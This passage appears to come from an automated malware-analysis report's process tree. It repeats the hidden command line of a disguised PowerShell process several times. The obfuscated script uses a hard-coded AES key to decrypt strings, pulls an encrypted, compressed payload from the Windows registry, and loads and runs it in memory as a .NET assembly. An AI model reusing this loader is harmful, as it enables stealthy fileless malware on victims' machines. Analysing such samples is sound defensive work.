[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        28⤵
        
        PID:3148
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8708).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        28⤵
        
        PID:2016
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8708).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        28⤵
        
        PID:9652
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8708).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join 